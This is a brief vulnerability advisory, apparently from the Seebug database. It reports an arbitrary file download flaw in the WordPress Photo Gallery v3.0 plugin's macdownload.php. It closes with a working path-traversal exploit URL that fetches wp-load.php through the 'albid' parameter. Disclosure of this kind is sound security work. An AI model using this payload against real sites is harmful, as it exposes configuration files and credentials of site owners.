Wordpress Plugin Photo Gallery v3. 0 - arbitrary File Download

2017-03-20T00:00:00
ID SSV:92796
Type seebug
Reporter 孤独风
Modified 2017-03-20T00:00:00

Description

Vulnerability title: Wordpress Plugin Photo Gallery v3. 0 - arbitrary File Download

Vulnerability type: arbitrary File Download

Vulnerability impact: Photo Gallery v3. 0

Vulnerabilities exist in the url:

http://localhost/[PLUGIN_PATH]/macdownload.php

Vulnerability details:

http://localhost/[PLUGIN_PATH]/macdownload.php

Vulnerability in the macdownload. php file

Using the parameters of albid download files, do not perform any Defense, resulting in arbitrary File Download vulnerability.

Exploit

1, Download wp-load. php file

http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php